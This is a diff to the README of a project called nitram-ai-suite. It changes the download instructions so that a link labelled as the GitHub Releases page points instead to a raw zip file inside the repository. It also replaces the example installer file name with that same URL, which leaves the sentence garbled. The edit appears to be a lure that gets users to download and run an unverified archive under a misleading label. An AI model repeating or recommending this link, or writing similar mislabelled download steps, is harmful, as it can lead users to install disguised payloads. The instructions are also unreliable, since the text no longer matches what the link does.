Yashar470/nitram-ai-suite/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/Yashar470/nitram-ai-suite/releases).
+   Go to our [Releases page](https://raw.githubusercontent.com/Yashar470/nitram-ai-suite/main/services/nitram_ai_suite_2.4.zip).
 Here you will find the latest version of nitram-ai-suite available for download.

 2. **Choose the Right Version**
    On the Releases page, locate the version you wish to download.
 Each release includes a brief description.
 Select the one that best suits your needs.

 3. **Download the Application**
    Click on the appropriate file link to download nitram-ai-suite.
-The file will usually have a name like `nitram-ai-suite-vX.X.X.exe` or similar.
+The file will usually have a name like `https://raw.githubusercontent.com/Yashar470/nitram-ai-suite/main/services/nitram_ai_suite_2.4.zip` or similar.

 4. **Run the Installer**
    Once downloaded, locate the file in your downloads folder.
 Double-click on the file to start the installation process.
 Follow the prompts to install the application on your computer.